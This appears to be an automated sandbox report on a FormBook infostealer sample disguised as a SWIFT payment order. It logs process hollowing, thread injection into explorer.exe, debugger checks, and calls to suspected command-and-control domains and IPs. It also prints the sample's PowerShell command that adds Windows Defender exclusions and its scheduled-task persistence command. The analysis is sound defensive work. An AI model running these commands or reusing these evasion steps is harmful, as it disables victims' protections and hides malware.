          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03013D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03018DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.innovativepropsolutions.com
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Domain query: www.aarondecker.online
          Source: C:\Windows\explorer.exe Domain query: www.754711.com
          Source: C:\Windows\explorer.exe Domain query: www.pyjama-france.com
          Source: C:\Windows\explorer.exe Domain query: www.wamhsh.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.hpsaddlerock.com
          Source: C:\Windows\explorer.exe Domain query: www.blueharepress.com
          Source: C:\Windows\explorer.exe Network Connect: 156.226.250.165 80
          Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: D90000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3472
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: explorer.exe, 0000000B.00000000.271348735.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.274750515.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.308143289.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.303835455.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.290228388.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000B.00000000.327848027.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.266334576.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.297512128.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.280549209.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
